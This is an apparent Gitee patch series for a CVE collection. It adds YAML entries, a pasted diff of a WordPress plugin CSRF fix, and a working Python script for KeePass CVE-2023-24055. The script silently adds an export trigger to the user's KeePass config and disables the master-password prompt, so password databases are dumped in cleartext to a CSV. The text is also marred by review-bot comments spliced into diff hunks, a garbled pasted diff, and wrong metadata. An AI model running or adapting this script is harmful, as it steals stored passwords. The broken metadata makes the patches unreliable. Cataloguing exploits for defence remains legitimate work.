From f17b4da67463fb333ebba5f2ea71162b81822bea Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 07:47:01 +0000
Subject: [PATCH 01/23] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20Exit=20Strategy?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/Exit Strategy/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/Exit Strategy/.keep
diff --git a/cve/Exit Strategy/.keep b/cve/Exit Strategy/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From ae672e33bdeb17c10682bfa17cd8f34e183a78d1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 07:47:23 +0000
Subject: [PATCH 02/23] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2013-10025?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/Exit Strategy/CVE-2013-10025/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/Exit Strategy/CVE-2013-10025/.keep
diff --git a/cve/Exit Strategy/CVE-2013-10025/.keep b/cve/Exit Strategy/CVE-2013-10025/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 74594a647b8901d6243f40dd4fe4f6f52204fd5b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 07:48:19 +0000
Subject: [PATCH 03/23] add cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王一名
---
 .../CVE-2013-10025/CVE-2013-10025.php | 42 +++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php
diff --git a/cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php b/cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php
new file mode 100644
index 00000000..d0ee8f03
--- /dev/null
+++ b/cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php
@@ -0,0 +1,42 @@
+@@ -3,18 +3,21 @@
+/**
+ * @package Wordpress Exit Strategy
+ * @author Bouzid Nazim Zitouni
+ * @version 1.55
+ * @version 1.59
+ */
+/*
+Plugin Name: Wordpress Exit Strategy
+Plugin URI: http://angrybyte.com/wordpress-plugins/wordpress-exit-strategy/
+Description: Exit Strategy will pass all outgoing links from your site through a nofollow link to an exit page before finally being redirected to the external link. You may place anything in your exit page: Ads, Subscribtion buttons, etc. Using Wordpress Exit Strategy you improve your SEO score by not linking directly to external pages, you get more subscribers & more revenues if you use Ads.
+Author: Bouzid Nazim Zitouni
+Version: 1.55
+Version: 1.59
+Author URI: http://angrybyte.com
+*/
+
+
+if(!function_exists('add_action')){
+ echo ""; // someone is trying to run the plugin directly, added to avoid full path disclosure.
+ die;
+}
+add_option("exitpagecontents",
+ 'Thank you for your visit, You`ll be redirected in %n% seconds
Click here if you are not redirected automatically',
+ 'Contents of the Exit page', 'yes');
+@@ -35,7 +38,7 @@ function exitpageadmin()
+function exit_page_admin()
+{
+
+ if ($_POST['xx'])
+ if (($_POST["xx"])&& (is_admin())&& check_admin_referer( 'exit_strategy_save', 'exit_strategy_nonce' ))
+ {
+ update_option('exitpagecontents', $_POST['xx']);
+ update_option('redirecttoparent', $_POST['redirectpar']);
+@@ -83,7 +86,7 @@ function exit_page_admin()
+ {
+ echo "";
+ }
+
+ wp_nonce_field( 'exit_strategy_save','exit_strategy_nonce' );
+ echo <<< EOFT
+
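Review bot: The file added as CVE-2013-10025.php is a pasted unified diff of the upstream fix whose inner `+`/`-` column is gone, so the unguarded `if ($_POST['xx'])` and the nonce-checked condition sit on consecutive lines (as do `Version: 1.55` and `Version: 1.59`) with nothing to tell the vulnerable side from the fixed one. Storing it under a `.patch` name with the markers intact, or adding a header comment that names the 1.55 line and the 1.59 line, would make the entry readable. In the fixed condition, `is_admin()` only reports that an admin screen is being requested, not that the user is privileged, so the nonce check is better paired with a capability check such as `current_user_can( 'manage_options' )`; whether the menu registration already enforces one is not visible here. `$_POST['xx']` and `$_POST['redirectpar']` also reach `update_option()` unsanitised, and the body of `exit_page_admin()` continues outside the quoted fragments.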
-- Gitee
From cc49df309bc533b41a074d25d497c9475b6c1113 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 07:48:51 +0000
Subject: [PATCH 04/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Exit=20Strategy/CVE-2013-10025/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/Exit Strategy/CVE-2013-10025/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/Exit Strategy/CVE-2013-10025/.keep
diff --git a/cve/Exit Strategy/CVE-2013-10025/.keep b/cve/Exit Strategy/CVE-2013-10025/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From 9a6f9fb5017a16d6a12b5e720ddd4419b62ea5d5 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 07:50:39 +0000
Subject: [PATCH 05/23] add cve/Exit Strategy/CVE-2013-10025/READ ME.md.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王一名
---
 cve/Exit Strategy/CVE-2013-10025/READ ME.md | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/Exit Strategy/CVE-2013-10025/READ ME.md
diff --git a/cve/Exit Strategy/CVE-2013-10025/READ ME.md b/cve/Exit Strategy/CVE-2013-10025/READ ME.md
new file mode 100644
index 00000000..e69de29b
-- Gitee
From c9c2bd453d977bad675c15c176fc22c1d97dd7eb Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 07:50:51 +0000
Subject: [PATCH 06/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Exit=20Strategy/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/Exit Strategy/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/Exit Strategy/.keep
diff --git a/cve/Exit Strategy/.keep b/cve/Exit Strategy/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From 9731884de359db82f31c952513f0ce09f6d09aad Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 07:50:56 +0000
Subject: [PATCH 07/23] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/Exit Strategy/yaml/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/Exit Strategy/yaml/.keep
diff --git a/cve/Exit Strategy/yaml/.keep b/cve/Exit Strategy/yaml/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 48a2dbb4faf466f587be20245c283a1e67791575 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 07:51:23 +0000
Subject: [PATCH 08/23] add cve/Exit Strategy/yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王一名
---
 cve/Exit Strategy/yaml/CVE-2013-10025.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/Exit Strategy/yaml/CVE-2013-10025.yaml
diff --git a/cve/Exit Strategy/yaml/CVE-2013-10025.yaml b/cve/Exit Strategy/yaml/CVE-2013-10025.yaml
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 22246a0ad304fc0eb8427adf20cac1c27eeb0465 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 07:55:38 +0000
Subject: [PATCH 09/23] update cve/Exit Strategy/yaml/CVE-2013-10025.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王一名
---
 cve/Exit Strategy/yaml/CVE-2013-10025.yaml | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
diff --git a/cve/Exit Strategy/yaml/CVE-2013-10025.yaml b/cve/Exit Strategy/yaml/CVE-2013-10025.yaml
index e69de29b..6206c59f 100644
--- a/cve/Exit Strategy/yaml/CVE-2013-10025.yaml
+++ b/cve/Exit Strategy/yaml/CVE-2013-10025.yaml
@@ -0,0 +1,21 @@
+id: CVE-2013-10025
+source: https://github.com/wp-plugins/exit-strategy/commit/d964b8e961b2634158719f3328f16eda16ce93ac
+info:
+ name: Exit Strategy Plugin 1.55
+ severity: medium
+ description: |
+ 在Exit Strategy Plugin 1.55中发现一个漏洞,并将其归类为有问题。受此问题影响的是文件exitpage.php中的函数exitpageadmin。该操作会导致跨站请求伪造。该攻击可能是远程发起的。升级到1.59版本能够解决这个问题。
+ scope-of-influence:
+ Docker 20.10.15, build fd82621
+ reference:
+ - https://github.com/wp-plugins/exit-strategy/commit/d964b8e961b2634158719f3328f16eda16ce93ac
+ - https://vuldb.com/?ctiid.225266
+ - https://vuldb.com/?id.225266
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2013-10025
+ cwe-id: CWE-352
+ cnvd-id: None
+ kve-id: None
+ tags: Exit Strategy
\ No newline at end of file
-- Gitee
From 15029974a7c8ac3f7a0f2551853925ec602e66ec Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 07:55:47 +0000
Subject: [PATCH 10/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Exit=20Strategy/yaml/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/Exit Strategy/yaml/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/Exit Strategy/yaml/.keep
diff --git a/cve/Exit Strategy/yaml/.keep b/cve/Exit Strategy/yaml/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From 93021199397d027498d3007b58528c5fca28e213 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 07:57:09 +0000
Subject: [PATCH 11/23] update other_list.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王一名
---
 other_list.yaml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/other_list.yaml b/other_list.yaml
index ede901d9..1a41f3fc 100644
--- a/other_list.yaml
+++ b/other_list.yaml
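Review bot: `scope-of-influence: Docker 20.10.15, build fd82621` does not describe a WordPress plugin and looks carried over from another entry's template. The description in this same hunk names Exit Strategy Plugin 1.55 as affected and 1.59 as the fixed version, so the field would be more useful as `scope-of-influence: Exit Strategy Plugin 1.55 (fixed in 1.59)`. If the field is meant to record the test environment instead, the WordPress and plugin versions used are what a reader needs, not a Docker build id.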
@@ -58,5 +58,7 @@ cve: - CVE-2022-30525 WordPress: - CVE-2019-8942 + Exit Strategy: + - CVE-2013-10025 cnvd: -- Gitee From 4e541f95579aaa8a603d5d1f5b912a3e8c995746 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 08:29:11 +0000 Subject: [PATCH 12/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Exit=20Strategy?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../CVE-2013-10025/CVE-2013-10025.php | 42 ------------------- cve/Exit Strategy/CVE-2013-10025/READ ME.md | 0 cve/Exit Strategy/yaml/CVE-2013-10025.yaml | 21 ---------- 3 files changed, 63 deletions(-) delete mode 100644 cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php delete mode 100644 cve/Exit Strategy/CVE-2013-10025/READ ME.md delete mode 100644 cve/Exit Strategy/yaml/CVE-2013-10025.yaml diff --git a/cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php b/cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php deleted file mode 100644 index d0ee8f03..00000000 --- a/cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php +++ /dev/null 
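Review bot: This index entry outlives the files it points to: patch 12/23, later in this series, deletes everything under cve/Exit Strategy/ (the .php, READ ME.md and yaml files), and none of the remaining patches shown touches other_list.yaml again, so `Exit Strategy: - CVE-2013-10025` is left dangling. Either drop these two lines in the commit that removes the directory or keep the entry's files. Any tooling that walks other_list.yaml to locate a product's yaml file would presumably fail on the missing path.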
@@ -1,42 +0,0 @@
-@@ -3,18 +3,21 @@
-/**
- * @package Wordpress Exit Strategy
- * @author Bouzid Nazim Zitouni
- * @version 1.55
- * @version 1.59
- */
-/*
-Plugin Name: Wordpress Exit Strategy
-Plugin URI: http://angrybyte.com/wordpress-plugins/wordpress-exit-strategy/
-Description: Exit Strategy will pass all outgoing links from your site through a nofollow link to an exit page before finally being redirected to the external link. You may place anything in your exit page: Ads, Subscribtion buttons, etc. Using Wordpress Exit Strategy you improve your SEO score by not linking directly to external pages, you get more subscribers & more revenues if you use Ads.
-Author: Bouzid Nazim Zitouni
-Version: 1.55
-Version: 1.59
-Author URI: http://angrybyte.com
-*/
-
-
-if(!function_exists('add_action')){
- echo ""; // someone is trying to run the plugin directly, added to avoid full path disclosure.
- die;
-}
-add_option("exitpagecontents",
- 'Thank you for your visit, You`ll be redirected in %n% seconds
Click here if you are not redirected automatically',
- 'Contents of the Exit page', 'yes');
-@@ -35,7 +38,7 @@ function exitpageadmin()
-function exit_page_admin()
-{
-
- if ($_POST['xx'])
- if (($_POST["xx"])&& (is_admin())&& check_admin_referer( 'exit_strategy_save', 'exit_strategy_nonce' ))
- {
- update_option('exitpagecontents', $_POST['xx']);
- update_option('redirecttoparent', $_POST['redirectpar']);
-@@ -83,7 +86,7 @@ function exit_page_admin()
- {
- echo "";
- }
-
- wp_nonce_field( 'exit_strategy_save','exit_strategy_nonce' );
- echo <<< EOFT
-
diff --git a/cve/Exit Strategy/CVE-2013-10025/READ ME.md b/cve/Exit Strategy/CVE-2013-10025/READ ME.md
deleted file mode 100644
index e69de29b..00000000
diff --git a/cve/Exit Strategy/yaml/CVE-2013-10025.yaml b/cve/Exit Strategy/yaml/CVE-2013-10025.yaml
deleted file mode 100644
index 6206c59f..00000000
--- a/cve/Exit Strategy/yaml/CVE-2013-10025.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: CVE-2013-10025
-source: https://github.com/wp-plugins/exit-strategy/commit/d964b8e961b2634158719f3328f16eda16ce93ac
-info:
- name: Exit Strategy Plugin 1.55
- severity: medium
- description: |
- 在Exit Strategy Plugin 1.55中发现一个漏洞,并将其归类为有问题。受此问题影响的是文件exitpage.php中的函数exitpageadmin。该操作会导致跨站请求伪造。该攻击可能是远程发起的。升级到1.59版本能够解决这个问题。
- scope-of-influence:
- Docker 20.10.15, build fd82621
- reference:
- - https://github.com/wp-plugins/exit-strategy/commit/d964b8e961b2634158719f3328f16eda16ce93ac
- - https://vuldb.com/?ctiid.225266
- - https://vuldb.com/?id.225266
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
- cvss-score: 4.3
- cve-id: CVE-2013-10025
- cwe-id: CWE-352
- cnvd-id: None
- kve-id: None
- tags: Exit Strategy
\ No newline at end of file
-- Gitee
From db328e210058d88e928547c10b99fd32f71c6e86 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 08:29:47 +0000
Subject: [PATCH 13/23] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20XML?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/XML/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/XML/.keep
diff --git a/cve/XML/.keep b/cve/XML/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 8f92811388cfd6cca71cfe3cebf933a73e289f6e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 08:30:11 +0000
Subject: [PATCH 14/23] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/XML/yaml/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/XML/yaml/.keep
diff --git a/cve/XML/yaml/.keep b/cve/XML/yaml/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 7c1b9b6654d81a73e7907d7595279a5d77935e67 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 08:30:30 +0000
Subject: [PATCH 15/23] add cve/XML/yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王一名
---
 cve/XML/yaml/CVE-2023-24055.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/XML/yaml/CVE-2023-24055.yaml
diff --git a/cve/XML/yaml/CVE-2023-24055.yaml b/cve/XML/yaml/CVE-2023-24055.yaml
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 4ce716bf9ba7dfab58d480e59816f64386b40ff7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 08:30:46 +0000
Subject: [PATCH 16/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/XML/yaml/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/XML/yaml/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/XML/yaml/.keep
diff --git a/cve/XML/yaml/.keep b/cve/XML/yaml/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From 0eeb7d72696c2108fd5b7ff20dad117e0cfdaf91 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 08:30:57 +0000
Subject: [PATCH 17/23] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2023-24055?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/XML/CVE-2023-24055/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/XML/CVE-2023-24055/.keep
diff --git a/cve/XML/CVE-2023-24055/.keep b/cve/XML/CVE-2023-24055/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From a7523715d9f0e95bab0e53c392b42aa3e8a20474 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 08:31:25 +0000
Subject: [PATCH 18/23] add cve/XML/CVE-2023-24055/CVE-2023-24055.py.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王一名
---
 cve/XML/CVE-2023-24055/CVE-2023-24055.py | 74 ++++++++++++++++++++++++
 1 file changed, 74 insertions(+)
 create mode 100644 cve/XML/CVE-2023-24055/CVE-2023-24055.py
diff --git a/cve/XML/CVE-2023-24055/CVE-2023-24055.py b/cve/XML/CVE-2023-24055/CVE-2023-24055.py
new file mode 100644
index 00000000..d67da402
--- /dev/null
+++ b/cve/XML/CVE-2023-24055/CVE-2023-24055.py
@@ -0,0 +1,74 @@
+import os
+from lxml import etree
+
+print('CVE-2029-24055 POC')
+print('======================')
+print('!!! Warning !!!')
+print('!!! This tool will try to add a Trigger so that the KeePass database is exported without protection!')
+print('!!! This tool does not check for anything and will just overwrite whatever it wants to!')
+print('!!! No backup, no mercy! Chances are high that this tool will leave your KeePass config in a corrupted state!')
+print('!!! No functionality is guaranteed! Use at your own risk!')
+print('See: https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/')
+print('======================')
+if os.name != 'nt':
+ print('Sorry, this tool works only under Windows!')
+ exit(1)
+
+# Get path to default config
+config_file=os.getenv('APPDATA')+"\KeePass\KeePass.config.xml"
+print(f"Reading from this config file: {config_file}")
+
+# Read Config
+tree = etree.parse(config_file)
+root = tree.getroot()
+
+# parse trough all Triggers to remove old versions
+for trigger in root.findall("./Application/TriggerSystem/Triggers/"):
+ if trigger.find('Guid').text == "yjxXO87yOkOtkWWCrf2CXQ==":
+ print("Removing old trigger!")
+ parent = trigger.getparent()
+ parent.remove(trigger)
+
+# Add malicious content
+triggers = root.find("./Application/TriggerSystem/")
+new_trigger = etree.SubElement(triggers, "Trigger")
+new_guid = etree.SubElement(new_trigger, "Guid")
+new_guid.text = "yjxXO87yOkOtkWWCrf2CXQ=="
+new_name = etree.SubElement(new_trigger, "Name")
+new_name.text = "Malicious export"
+new_events = etree.SubElement(new_trigger, "Events")
+new_event = etree.SubElement(new_events, "Event")
+new_typeguid = etree.SubElement(new_event, "TypeGuid")
+new_typeguid.text = "5f8TBoW4QYm5BvaeKztApw==" # on openening database...
+new_parameters = etree.SubElement(new_event, "Parameters")
+new_parameter = etree.SubElement(new_parameters, "Parameter")
+new_parameter.text = "0"
+etree.SubElement(new_parameters, "Parameter")
+etree.SubElement(new_trigger, "Conditions")
+new_actions = etree.SubElement(new_trigger, "Actions")
+new_action = etree.SubElement(new_actions, "Action")
+new_typeguid = etree.SubElement(new_action, "TypeGuid")
+new_typeguid.text = "D5prW87VRr65NO2xP5RIIg==" # ... do malicious export
+new_parameters = etree.SubElement(new_action, "Parameters")
+new_parameter = etree.SubElement(new_parameters, "Parameter")
+new_parameter.text = "c:\\Users\\%USERNAME%\\KeepassExport.csv"
+new_parameter = etree.SubElement(new_parameters, "Parameter")
+new_parameter.text = "KeePass CSV (1.x)"
+etree.SubElement(new_parameters, "Parameter")
+etree.SubElement(new_parameters, "Parameter")
+
+# Disable Security policy
+exportnokey = root.find("./Security/Policy/ExportNoKey")
+try:
+ print("Removing old Policy!")
+ parent = exportnokey.getparent()
+ parent.remove(exportnokey)
+except:
+ pass
+
+policy = root.find("./Security/Policy")
+export_no_key = etree.SubElement(policy, "ExportNoKey")
+export_no_key.text = "true"
+
+#config_file=os.getenv('APPDATA')+"\KeePass\KeePass.config-BAK.xml"
+tree.write(config_file, encoding='utf-8', xml_declaration=True)
\ No newline at end of file
-- Gitee
From db23a27170ddbeb4022ef616eabbf8b936758a34 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 08:31:32 +0000
Subject: [PATCH 19/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/XML/CVE-2023-24055/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/XML/CVE-2023-24055/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/XML/CVE-2023-24055/.keep
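Review bot: The banner prints `CVE-2029-24055 POC`, which matches neither the file name nor the yaml entry added later in this series; it should read `print('CVE-2023-24055 POC')`. The script writes straight back to the user's live KeePass.config.xml and its only alternative path is commented out on the second-to-last line, so a lab reproduction would be safer pointed at a copy of the config. The bare `except: pass` around the policy removal prints `Removing old Policy!` before knowing the element exists and then hides every other error as well. For readers using this entry defensively, the README should state that an unexpected export trigger and an `ExportNoKey` policy element in the config file are the artefacts this change leaves behind.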
diff --git a/cve/XML/CVE-2023-24055/.keep b/cve/XML/CVE-2023-24055/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From 7564d818e4476234f262da1390e008f9765b724c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 08:32:49 +0000
Subject: [PATCH 20/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/XML/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/XML/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/XML/.keep
diff --git a/cve/XML/.keep b/cve/XML/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From 59b9ae71cc072c6dbe8571da2b68439e2abcd45c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 08:35:45 +0000
Subject: [PATCH 21/23] update cve/XML/yaml/CVE-2023-24055.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王一名
---
 cve/XML/yaml/CVE-2023-24055.yaml | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
diff --git a/cve/XML/yaml/CVE-2023-24055.yaml b/cve/XML/yaml/CVE-2023-24055.yaml
index e69de29b..fa15b0d0 100644
--- a/cve/XML/yaml/CVE-2023-24055.yaml
+++ b/cve/XML/yaml/CVE-2023-24055.yaml
@@ -0,0 +1,20 @@
+id: CVE-2023-24055
+source:
+ https://github.com/deetl/CVE-2023-24055
+info:
+ name: XML
+ severity: medium
+ description: |
+ KeePass通过2.53(在默认安装中)允许拥有写入XML配置文件的权限攻击者,通过添加一个导出触发器来获得明文密码。
+ reference:
+ - https://securityboulevard.com/2023/01/keepass-password-manager-leak-cve-richixbw/
+ - https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/
+ - https://sourceforge.net/p/keepass/feature-requests/2773/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
+ cvss-score: 5.5
+ cve-id: CVE-2023-24055
+ cwe-id: CWE-312
+ cnvd-id: None
+ kve-id: None
+ tags: XML
\ No newline at end of file
-- Gitee
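Review bot: `name: XML` and `tags: XML` file this entry under a data format rather than the affected product; the description in the same hunk says the issue is in KeePass through 2.53. Using `name: KeePass` and `tags: KeePass`, with a matching directory name, would let someone searching the index by product find it. The entry also omits the `scope-of-influence` field that the CVE-2013-10025 entry earlier in this series carries, so the affected version range is only stated in the free-text description.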
From a55d66cc919c3ec91773ea479f10158c53475458 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 08:36:26 +0000
Subject: [PATCH 22/23] add cve/XML/CVE-2023-24055/READ ME.md.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王一名
---
 cve/XML/CVE-2023-24055/READ ME.md | 5 +++++
 1 file changed, 5 insertions(+)
 create mode 100644 cve/XML/CVE-2023-24055/READ ME.md
diff --git a/cve/XML/CVE-2023-24055/READ ME.md b/cve/XML/CVE-2023-24055/READ ME.md
new file mode 100644
index 00000000..f0bfb5fa
--- /dev/null
+++ b/cve/XML/CVE-2023-24055/READ ME.md
@@ -0,0 +1,5 @@
+CVE-2023-24055的概念验证代码
+
+该工具将打开目录%APPDATA%\Roaming\KeePass\KeePass.config.xml,并将添加一个触发器到KeePass的配置中,以便当前数据库在打开时被导出到c:\Users\%USERNAME%\KeepassExport.csv。
+
+参数ExportNoKey被设置为 "true",这样KeePass就不会在导出过程中要求提供主密码。
\ No newline at end of file
-- Gitee
From 8d4e36456a18900f0b0ac29365276802d91b7fed Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?=
Date: Tue, 11 Apr 2023 08:37:17 +0000
Subject: [PATCH 23/23] update openkylin_list.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王一名
---
 openkylin_list.yaml | 2 ++
 1 file changed, 2 insertions(+)
